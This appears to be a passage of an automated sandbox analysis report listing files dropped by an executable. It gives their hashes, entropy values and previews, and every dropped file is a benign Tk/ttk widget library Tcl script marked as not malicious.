                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17658
                                                                                                                                                                                                                              Entropy (8bit):5.026830367336785
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:sca9Jzcyzf6yzwO+v+iPT3vKof8q3YIuR13a:sT9Jzcy76wiV3YNa
                                                                                                                                                                                                                              MD5:7FFD7A32C7F8E234763E99E3357DB624
                                                                                                                                                                                                                              SHA1:67C67557F3A6DC8B240E85D46F6B733FEE45A013
                                                                                                                                                                                                                              SHA-256:266553EB9EED333DD836BA96204AE008F10686F4F12C404187F1E01CAB65D246
                                                                                                                                                                                                                              SHA-512:D18B73E44F37ED92B9FD7C1F6510285D1280EB5BC665B46996E538924E9D1CAD63337279BF92587132C3AEA497325A17CCE671EA59537B350F6D921C25346F39
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# DERIVED FROM: tk/library/entry.tcl r1.22..#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 2004, Joe English..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval ttk {.. namespace eval entry {...variable State.....set State(x) 0...set State(selectMode) none...set State(anchor) 0...set State(scanX) 0...set State(scanIndex) 0...set State(scanMoved) 0.....# Button-2 scan speed is (scanNum/scanDen) characters...# per pixel of mouse movement....# The standard Tk entry widget uses the equivalent of...# scanNum = 10, scanDen = average character width....# I don't know why that was chosen....#...set State(scanNum) 1...set State(scanDen) 1...set State(deadband) 3.;# #pixels for mouse-moved deadband... }..}....### Option database settings...#..option add *TEntry.cursor [ttk::cursor text] widg
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5732
                                                                                                                                                                                                                              Entropy (8bit):5.001928619185109
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:NzEh94ntnVU8Z/1LkAKgW22SeLMQR8hzcksejmOF4ytZm:Sh9ahV3ZWAKgWDfktm
                                                                                                                                                                                                                              MD5:80331FCBE4C049FF1A0D0B879CB208DE
                                                                                                                                                                                                                              SHA1:4EB3EFDFE3731BD1AE9FD52CE32B1359241F13CF
                                                                                                                                                                                                                              SHA-256:B94C319E5A557A5665B1676D602B6495C0887C5BACF7FA5B776200112978BB7B
                                                                                                                                                                                                                              SHA-512:A4BD2D91801C121A880225F1F3D0C4E30BF127190CF375F6F7A49EB4239A35C49C44F453D6D3610DF0D6A7B3CB15F4E79BD9C129025CC496CEB856FCC4B6DE87
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Font specifications...#..# This file, [source]d at initialization time, sets up the following..# symbolic fonts based on the current platform:..#..# TkDefaultFont.-- default for GUI items not otherwise specified..# TkTextFont.-- font for user text (entry, listbox, others)..# TkFixedFont.-- standard fixed width font..# TkHeadingFont.-- headings (column headings, etc)..# TkCaptionFont -- dialog captions (primary text in alert dialogs, etc.)..# TkTooltipFont.-- font to use for tooltip windows..# TkIconFont.-- font to use for icon captions..# TkMenuFont.-- used to use for menu items..#..# In Tk 8.5, some of these fonts may be provided by the TIP#145 implementation..# (On Windows and Mac OS X as of Oct 2007)...#..# +++ Platform notes:..#..# Windows:..#.The default system font changed from "MS Sans Serif" to "Tahoma"..# .in Windows XP/Windows 2000...#..#.MS documentation says to use "Tahoma 8" in Windows 2000/XP,..#.although many MS programs still use "MS Sans Serif 8"..#..#.Should use
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6443
                                                                                                                                                                                                                              Entropy (8bit):4.9213750923402735
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:toMcJQkmcE6fNuLyiCzSLSRwgppdT3kXdpK3dpKkSH2tOTjvAG:tRc6kFbcH2pyXz+zO2y
                                                                                                                                                                                                                              MD5:F11A76FBABF35E446A1200A5A7A6730A
                                                                                                                                                                                                                              SHA1:4CBAB3507C1EF275691C98620D2B5CEEB9043B3E
                                                                                                                                                                                                                              SHA-256:54663FBF524CAD9D74AB1EC44B7FDDE0B87F06E5347191962C97F51F714E29BB
                                                                                                                                                                                                                              SHA-512:95471D1519AE663EC7EB4639D847019E0C9F70DEA2B0680D81FB8BBE7CD1FF643A3DF5E06CA2CC54385BE094BDCC64AB0F1AA1652F91D16C4EF7B68CB670371E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Bindings for Menubuttons...#..# Menubuttons have three interaction modes:..#..# Pulldown: Press menubutton, drag over menu, release to activate menu entry..# Popdown: Click menubutton to post menu..# Keyboard: <space> or accelerator key to post menu..#..# (In addition, when menu system is active, "dropdown" -- menu posts..# on mouse-over. Ttk menubuttons don't implement this)...#..# For keyboard and popdown mode, we hand off to tk_popup and let..# the built-in Tk bindings handle the rest of the interaction...#..# ON X11:..#..# Standard Tk menubuttons use a global grab on the menubutton...# This won't work for Ttk menubuttons in pulldown mode,..# since we need to process the final <ButtonRelease> event,..# and this might be delivered to the menu. So instead we..# rely on the passive grab that occurs on <Button> events,..# and transition to popdown mode when the mouse is released..# or dragged outside the menubutton...#..# ON WINDOWS:..#..# I'm not sure what the hell is going on h
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5825
                                                                                                                                                                                                                              Entropy (8bit):4.96378772387536
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:RErUhyi5JeUQBWdz6eP8ClR6/u6AsBmPNNiREUkheLY1EVL23sN2JJjQdD:6uyiyDQBP8q6/u6AUREUsNEVq3y2jkdD
                                                                                                                                                                                                                              MD5:F811F3E46A4EFA73292F40D1CDDD265D
                                                                                                                                                                                                                              SHA1:7FC70A1984555672653A0840499954B854F27920
                                                                                                                                                                                                                              SHA-256:22264D8D138E2C0E9A950305B4F08557C5A73F054F8215C0D8CE03854042BE76
                                                                                                                                                                                                                              SHA-512:4424B7C687EB9B1804ED3B1C685F19D4D349753B374D9046240F937785C9713E8A760ADA46CB628C15F9C7983CE4A7987691C968330478C9C1A9B74E953E40AC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Bindings for TNotebook widget..#....namespace eval ttk::notebook {.. variable TLNotebooks ;# See enableTraversal..}....bind TNotebook <Button-1>..{ ttk::notebook::Press %W %x %y }..bind TNotebook <Right>...{ ttk::notebook::CycleTab %W 1; break }..bind TNotebook <Left>...{ ttk::notebook::CycleTab %W -1; break }..bind TNotebook <Control-Tab>..{ ttk::notebook::CycleTab %W 1; break }..bind TNotebook <Control-Shift-Tab>.{ ttk::notebook::CycleTab %W -1; break }..catch {..bind TNotebook <Control-ISO_Left_Tab>.{ ttk::notebook::CycleTab %W -1; break }..}..bind TNotebook <Destroy>..{ ttk::notebook::Cleanup %W }....# ActivateTab $nb $tab --..#.Select the specified tab and set focus...#..# Desired behavior:..#.+ take focus when reselecting the currently-selected tab;..#.+ keep focus if the notebook already has it;..#.+ otherwise set focus to the first traversable widget..#. in the newly-selected tab;..#.+ do not leave the focus in a deselected tab...#..proc ttk::notebook::ActivateTab {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2274
                                                                                                                                                                                                                              Entropy (8bit):4.951790637542993
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:zVAqE3ZF8b4rXzsqAOAXsmCLFeNqkFeNXez:zLeU4bzSs1M
                                                                                                                                                                                                                              MD5:848A62BCF6ED3C16A8CFD26C43E1BC4E
                                                                                                                                                                                                                              SHA1:6F5E3EDF62716B511CF575BE2C6C997AFA2FA1E7
                                                                                                                                                                                                                              SHA-256:20EE6AD9D701709724292A926AF93C93784B254B48A656ECC140EF3A0FE10A11
                                                                                                                                                                                                                              SHA-512:AE78028EAF96E5B77DEFF0CD655360DB3A8058AC98B6753D9B77D629EDFFC582999A22A7075B9F5BA83EE65DA093E2CCB0EEAA4049898910D7AF517FDE60B28E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Bindings for ttk::panedwindow widget...#....namespace eval ttk::panedwindow {.. variable State.. array set State {...pressed 0.. .pressX.-...pressY.-...sash .-...sashPos -.. }..}....## Bindings:..#..bind TPanedwindow <Button-1> ..{ ttk::panedwindow::Press %W %x %y }..bind TPanedwindow <B1-Motion>..{ ttk::panedwindow::Drag %W %x %y }..bind TPanedwindow <ButtonRelease-1> .{ ttk::panedwindow::Release %W %x %y }....bind TPanedwindow <Motion> ..{ ttk::panedwindow::SetCursor %W %x %y }..bind TPanedwindow <Enter> ..{ ttk::panedwindow::SetCursor %W %x %y }..bind TPanedwindow <Leave> ..{ ttk::panedwindow::ResetCursor %W }..# See <<NOTE-PW-LEAVE-NOTIFYINFERIOR>>..bind TPanedwindow <<EnteredChild>>.{ ttk::panedwindow::ResetCursor %W }....## Sash movement:..#..proc ttk::panedwindow::Press {w x y} {.. variable State.... set sash [$w identify $x $y].. if {$sash eq ""} {.. .set State(pressed) 0...return.. }.. set State(pressed) .1.. set State(pressX) .$x.. set
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1138
                                                                                                                                                                                                                              Entropy (8bit):4.763501917862434
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:nJ8v3O0NSiio0pNFVkIks0ImxlnINgDImSgGINSyWghT:JFqS/o03fkxs0Rn+gD4v+S2F
                                                                                                                                                                                                                              MD5:DBF3BF0E8F04E9435E9561F740DFC700
                                                                                                                                                                                                                              SHA1:C7619A05A834EFB901C57DCFEC2C9E625F42428F
                                                                                                                                                                                                                              SHA-256:697CC0A75AE31FE9C2D85FB25DCA0AFA5D0DF9C523A2DFAD2E4A36893BE75FBA
                                                                                                                                                                                                                              SHA-512:D3B323DFB3EAC4A78DA2381405925C131A99C6806AF6FD8041102162A44E48BF166982A4AE4AA142A14601736716F1A628D9587E292FA8E4842BE984374CC192
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Ttk widget set: progress bar utilities...#....namespace eval ttk::progressbar {.. variable Timers.;# Map: widget name -> after ID..}....# Autoincrement --..#.Periodic callback procedure for autoincrement mode..#..proc ttk::progressbar::Autoincrement {pb steptime stepsize} {.. variable Timers.... if {![winfo exists $pb]} {.. .# widget has been destroyed -- cancel timer...unset -nocomplain Timers($pb)...return.. }.... set Timers($pb) [after $steptime \.. .[list ttk::progressbar::Autoincrement $pb $steptime $stepsize] ].... $pb step $stepsize..}....# ttk::progressbar::start --..#.Start autoincrement mode. Invoked by [$pb start] widget code...#..proc ttk::progressbar::start {pb {steptime 50} {stepsize 1}} {.. variable Timers.. if {![info exists Timers($pb)]} {...Autoincrement $pb $steptime $stepsize.. }..}....# ttk::progressbar::stop --..#.Cancel autoincrement mode. Invoked by [$pb stop] widget code...#..proc ttk::progressbar::stop {pb} {.. variabl
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2787
                                                                                                                                                                                                                              Entropy (8bit):4.795451191784129
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:IKADAzizZIcAlRqucObmn4AzyVN2AJyhAzukPNP:IHIBRqupmLSZkklP
                                                                                                                                                                                                                              MD5:F1C33CC2D47115BBECD2E7C2FCB631A7
                                                                                                                                                                                                                              SHA1:0123A961242ED8049B37C77C726DB8DBD94C1023
                                                                                                                                                                                                                              SHA-256:B909ADD0B87FA8EE08FD731041907212A8A0939D37D2FF9B2F600CD67DABD4BB
                                                                                                                                                                                                                              SHA-512:96587A8C3555DA1D810010C10C516CE5CCAB071557A3C8D9BD65C647C7D4AD0E35CBED0788F1D72BAFAC8C84C7E2703FC747F70D9C95F720745A1FC4A701C544
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# scale.tcl - Copyright (C) 2004 Pat Thoyts <patthoyts@users.sourceforge.net>..#..# Bindings for the TScale widget....namespace eval ttk::scale {.. variable State.. array set State {...dragging 0.. }..}....bind TScale <Button-1> { ttk::scale::Press %W %x %y }..bind TScale <B1-Motion> { ttk::scale::Drag %W %x %y }..bind TScale <ButtonRelease-1> { ttk::scale::Release %W %x %y }....bind TScale <Button-2> { ttk::scale::Jump %W %x %y }..bind TScale <B2-Motion> { ttk::scale::Drag %W %x %y }..bind TScale <ButtonRelease-2> { ttk::scale::Release %W %x %y }....bind TScale <Button-3> { ttk::scale::Jump %W %x %y }..bind TScale <B3-Motion> { ttk::scale::Drag %W %x %y }..bind TScale <ButtonRelease-3> { ttk::scale::Release %W %x %y }....## Keyboard navigation bindings:..#..bind TScale <<LineStart>> { %W set [%W cget -from] }..bind TScale <<LineEnd>> { %W set [%W cget -to] }....bind TScale <<PrevChar>> { ttk::scale::Increment %W -1 }..bin
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3285
                                                                                                                                                                                                                              Entropy (8bit):4.979174619784594
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:tyASEji8RYQ8FGD7BDos9Q1TBfvq/HKTh9lkHv8T/mAezeLEAAFULxZh4x:eIi8qFu2d11XlhfkPcczeLS4Zm
                                                                                                                                                                                                                              MD5:3FB31A225CEC64B720B8E579582F2749
                                                                                                                                                                                                                              SHA1:9C0151D9E2543C217CF8699FF5D4299A72E8F13C
                                                                                                                                                                                                                              SHA-256:6EAA336B13815A7FC18BCD6B9ADF722E794DA2888D053C229044784C8C8E9DE8
                                                                                                                                                                                                                              SHA-512:E6865655585E3D2D6839B56811F3FD86B454E8CD44E258BB1AC576AD245FF8A4D49FBB7F43458BA8A6C9DAAC8DFA923A176F0DD8A9976A11BEA09E6E2D17BF45
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Bindings for TScrollbar widget..#....namespace eval ttk::scrollbar {.. variable State.. # State(xPress).--.. # State(yPress).-- initial position of mouse at start of drag... # State(first).-- value of -first at start of drag...}....bind TScrollbar <Button-1> ..{ ttk::scrollbar::Press %W %x %y }..bind TScrollbar <B1-Motion>..{ ttk::scrollbar::Drag %W %x %y }..bind TScrollbar <ButtonRelease-1>.{ ttk::scrollbar::Release %W %x %y }....bind TScrollbar <Button-2> ..{ ttk::scrollbar::Jump %W %x %y }..bind TScrollbar <B2-Motion>..{ ttk::scrollbar::Drag %W %x %y }..bind TScrollbar <ButtonRelease-2>.{ ttk::scrollbar::Release %W %x %y }....# Redirect scrollwheel bindings to the scrollbar widget..#..# The shift-bindings scroll left/right (not up/down)..# if a widget has both possibilities..set eventList [list <MouseWheel> <Shift-MouseWheel>]..switch [tk windowingsystem] {.. aqua {.. lappend eventList <Option-MouseWheel> <Shift-Option-MouseWheel>.. }.. x11 {..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2503
                                                                                                                                                                                                                              Entropy (8bit):4.830288003879418
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:naLvMnAqeYQWYh7FvBrrbnMCfY/aVAbAigWAuFM0PfWAX20:nWQapprPnJY/8A8iRFdPtj
                                                                                                                                                                                                                              MD5:DD6A1737B14D3F7B2A0B4F8BE99C30AF
                                                                                                                                                                                                                              SHA1:E6B06895317E73CD3DC78234DD74C74F3DB8C105
                                                                                                                                                                                                                              SHA-256:E92D77B5CDCA2206376DB2129E87E3D744B3D5E31FDE6C0BBD44A494A6845CE1
                                                                                                                                                                                                                              SHA-512:B74AE92EDD53652F8A3DB0D84C18F9CE9069805BCAB0D3C2DBB537D7C241AA2681DA69B699D88A10029798D7B5BC015682F64699BA475AE6A379EEF23B48DAAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Sizegrip widget bindings...#..# Dragging a sizegrip widget resizes the containing toplevel...#..# NOTE: the sizegrip widget must be in the lower right hand corner...#....switch -- [tk windowingsystem] {.. x11 -.. win32 {...option add *TSizegrip.cursor [ttk::cursor seresize] widgetDefault.. }.. aqua {.. .# Aqua sizegrips use default Arrow cursor... }..}....namespace eval ttk::sizegrip {.. variable State.. array set State {...pressed .0...pressX ..0...pressY ..0...width ..0...height ..0...widthInc.1...heightInc.1.. resizeX 1.. resizeY 1...toplevel .{}.. }..}....bind TSizegrip <Button-1> ..{ ttk::sizegrip::Press.%W %X %Y }..bind TSizegrip <B1-Motion> ..{ ttk::sizegrip::Drag .%W %X %Y }..bind TSizegrip <ButtonRelease-1> .{ ttk::sizegrip::Release %W %X %Y }....proc ttk::sizegrip::Press {W X Y} {.. variable State.... if {[$W instate disabled]} { return }.... set top [winfo toplevel $W].... # If the toplevel is not resi
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5003
                                                                                                                                                                                                                              Entropy (8bit):5.055050310142795
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:1qg/+yrjqA/K5ytxm1J1Ve6J1yQLUAzz/S76hrwxGGe2F:N/+yr2Gk1J1Ve6fxUAzDS76hrwxs2F
                                                                                                                                                                                                                              MD5:9C2833FAA9248F09BC2E6AB1BA326D59
                                                                                                                                                                                                                              SHA1:F13CF048FD706BBB1581DC80E33D1AAD910D93E8
                                                                                                                                                                                                                              SHA-256:DF286BB59F471AA1E19DF39AF0EF7AA84DF9F04DC4A439A747DD8BA43C300150
                                                                                                                                                                                                                              SHA-512:5FF3BE1E3D651C145950C3FC5B8C2E842211C937D1042173964383D4D59ECF5DD0EC39FF7771D029716F2D895F0B1A72591EF3BF7947FE64D4D6DB5F0B8ABFFB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# ttk::spinbox bindings..#....namespace eval ttk::spinbox { }....### Spinbox bindings...#..# Duplicate the Entry bindings, override if needed:..#....ttk::copyBindings TEntry TSpinbox....bind TSpinbox <Motion>...{ ttk::spinbox::Motion %W %x %y }..bind TSpinbox <Button-1> ..{ ttk::spinbox::Press %W %x %y }..bind TSpinbox <ButtonRelease-1> .{ ttk::spinbox::Release %W }..bind TSpinbox <Double-Button-1> .{ ttk::spinbox::DoubleClick %W %x %y }..bind TSpinbox <Triple-Button-1> .{} ;# disable TEntry triple-click....bind TSpinbox <Up>...{ event generate %W <<Increment>> }..bind TSpinbox <Down> ...{ event generate %W <<Decrement>> }....bind TSpinbox <<Increment>>..{ ttk::spinbox::Spin %W +1 }..bind TSpinbox <<Decrement>> ..{ ttk::spinbox::Spin %W -1 }....ttk::bindMouseWheel TSpinbox ..[list ttk::spinbox::MouseWheel %W]....## Motion --..#.Sets cursor...#..proc ttk::spinbox::Motion {w x y} {.. variable State.. ttk::saveCursor $w State(userConfCursor) [ttk::cursor text].. if { [$w ide
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10180
                                                                                                                                                                                                                              Entropy (8bit):4.886259798213254
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:FoTvMxHZZ1u2xj7+ZBHxjiXJv9IfwW+vr3UxjXEJDTF/MyLF3JcMzlsra2tYGa5P:mImAkRKYXMH59o4UbS30LWb
                                                                                                                                                                                                                              MD5:F705B3A292D02061DA0ABB4A8DD24077
                                                                                                                                                                                                                              SHA1:FD75C2250F6F66435444F7DEEF383C6397ED2368
                                                                                                                                                                                                                              SHA-256:C88B60FFB0F72E095F6FC9786930ADD7F9ED049EABC713F889F9A7DA516E188C
                                                                                                                                                                                                                              SHA-512:09817638DD3D3D5C57FA630C7EDF2F19C3956C9BD264DBF07627FA14A03AECD22D5A5319806E49EF1030204FADEF17C57CE8EAE4378A319AD2093321D9151C8F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# ttk::treeview widget bindings and utilities...#....namespace eval ttk::treeview {.. variable State.... # Enter/Leave/Motion.. #.. set State(activeWidget) .{}.. set State(activeHeading) .{}.... # Press/drag/release:.. #.. set State(pressMode) .none.. set State(pressX)..0.... # For pressMode == "resize".. set State(resizeColumn).#0.... # For pressmode == "heading".. set State(heading) .{}..}....### Widget bindings...#....bind Treeview.<Motion> ..{ ttk::treeview::Motion %W %x %y }..bind Treeview.<B1-Leave>..{ #nothing }..bind Treeview.<Leave>...{ ttk::treeview::ActivateHeading {} {}}..bind Treeview.<Button-1> ..{ ttk::treeview::Press %W %x %y }..bind Treeview.<Double-Button-1> .{ ttk::treeview::DoubleClick %W %x %y }..bind Treeview.<ButtonRelease-1> .{ ttk::treeview::Release %W %x %y }..bind Treeview.<B1-Motion> ..{ ttk::treeview::Drag %W %x %y }..bind Treeview .<Up> ..{ ttk::treeview::Keynav %W up }..bind Treeview .<Down> ..{ ttk::treeview
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4993
                                                                                                                                                                                                                              Entropy (8bit):4.954034141173847
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:lfxukTy5jPTq8LIgF2diyNTNR6nkrn4ijSSvNigyJ5612HtZG835MSvWOTRsHWU:BM+y5jrq8G/2nkEijSSvNigyJ5612Htw
                                                                                                                                                                                                                              MD5:AF45B2C8B43596D1BDECA5233126BD14
                                                                                                                                                                                                                              SHA1:A99E75D299C4579E10FCDD59389B98C662281A26
                                                                                                                                                                                                                              SHA-256:2C48343B1A47F472D1A6B9EE8D670CE7FB428DB0DB7244DC323FF4C7A8B4F64B
                                                                                                                                                                                                                              SHA-512:C8A8D01C61774321778AB149F6CA8DDA68DB69133CB5BA7C91938E4FD564160ECDCEC473222AFFB241304A9ACC73A36B134B3A602FD3587C711F2ADBB64AFA80
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Ttk widget set initialization script...#....### Source library scripts...#....namespace eval ::ttk {.. variable library.. if {![info exists library]} {...set library [file dirname [info script]].. }..}....source -encoding utf-8 [file join $::ttk::library fonts.tcl]..source -encoding utf-8 [file join $::ttk::library cursors.tcl]..source -encoding utf-8 [file join $::ttk::library utils.tcl]....## ttk::deprecated $old $new --..#.Define $old command as a deprecated alias for $new command..#.$old and $new must be fully namespace-qualified...#..proc ttk::deprecated {old new} {.. interp alias {} $old {} ttk::do'deprecate $old $new..}..## do'deprecate --..#.Implementation procedure for deprecated commands --..#.issue a warning (once), then re-alias old to new...#..proc ttk::do'deprecate {old new args} {.. deprecated'warning $old $new.. interp alias {} $old {} $new.. uplevel 1 [linsert $args 0 $new]..}....## deprecated'warning --..#.Gripe about use of deprecated comman
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8624
                                                                                                                                                                                                                              Entropy (8bit):5.001791071900077
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:e0ebpSp+IZwnmTmpx8xzaHfw8K7LlJWQl8p7M+R5:rw0+WmpWxa/w9nlJHu
                                                                                                                                                                                                                              MD5:51086BC3315A4AE4A8591A654CFC3CEA
                                                                                                                                                                                                                              SHA1:2AC08309C63575B7A01FA62D3C262643CD8C823A
                                                                                                                                                                                                                              SHA-256:4AA041C050758B3331DC395381F7FBCE81E387908FC7A3C6107C4E7140F56F2E
                                                                                                                                                                                                                              SHA-512:6D69F7EAC9D5AF3B3EA85AE3E74BDFA6278789502D5E35EFE94349BFC543503BE7540D783D2632E349DD53F21074C702AC1FC487EE70C74234A08397F7238723
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Utilities for widget implementations...#....### Focus management...#..# See also: #1516479..#....## ttk::takefocus --..#.This is the default value of the "-takefocus" option..#.for ttk::* widgets that participate in keyboard navigation...#..# NOTES:..#.tk::FocusOK (called by tk_focusNext) tests [winfo viewable]..#.if -takefocus is 1, empty, or missing; but not if it's a..#.script prefix, so we have to check that here as well...#..#..proc ttk::takefocus {w} {.. expr {[$w instate !disabled] && [winfo viewable $w]}..}....## ttk::GuessTakeFocus --..#.This routine is called as a fallback for widgets..#.with a missing or empty -takefocus option...#..#.It implements the same heuristics as tk::FocusOK...#..proc ttk::GuessTakeFocus {w} {.. # Don't traverse to widgets with '-state disabled':.. #.. if {![catch {$w cget -state} state] && $state eq "disabled"} {...return 0.. }.... # Allow traversal to widgets with explicit key or focus bindings:.. #.. if {[regexp {Key|F
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9710
                                                                                                                                                                                                                              Entropy (8bit):4.6639701588183895
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:BktY1F+qXd95WSZaHFHRE3GRKFh2oaoT/ezKpqvYMHab:V1F+cd95WSZuhRE34KbPmKmY2ab
                                                                                                                                                                                                                              MD5:0AA7F8B43C3E07F3A4DA07FC6DF9A1B0
                                                                                                                                                                                                                              SHA1:153AFB735B10BBA16CFBE161777232F983845D90
                                                                                                                                                                                                                              SHA-256:EC5F203C69DF390E9B99944CF3526D6E77DC6F68E9B1A029F326A41AFED1EF81
                                                                                                                                                                                                                              SHA-512:5406553211CD6714C98EF7765ABD46424CCB013343EFF693FDD3AE6E0AAE9B5983446E0E1CC706D6B2C285084BF83D397306D3D52028CBBCFB8F369857C5B69C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#..# Settings for Microsoft Windows Vista and Server 2008..#....# The Vista theme can only be defined on Windows Vista and above. The theme..# is created in C due to the need to assign a theme-enabled function for..# detecting when themeing is disabled. On systems that cannot support the..# Vista theme, there will be no such theme created and we must not..# evaluate this script.....if {"vista" ni [ttk::style theme names]} {.. return..}....namespace eval ttk::theme::vista {.... ttk::style theme settings vista {.... .ttk::style configure . \... -background SystemButtonFace \... -foreground SystemWindowText \... -selectforeground SystemHighlightText \... -selectbackground SystemHighlight \... -insertcolor SystemWindowText \... -font TkDefaultFont \... ;.....ttk::style map "." \... -foreground [list disabled SystemGrayText] \... ;.....ttk::style configure TButton -anchor center -padding {1 1} -width -11...ttk::style configure TRadiobutton -padding 2...ttk::
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
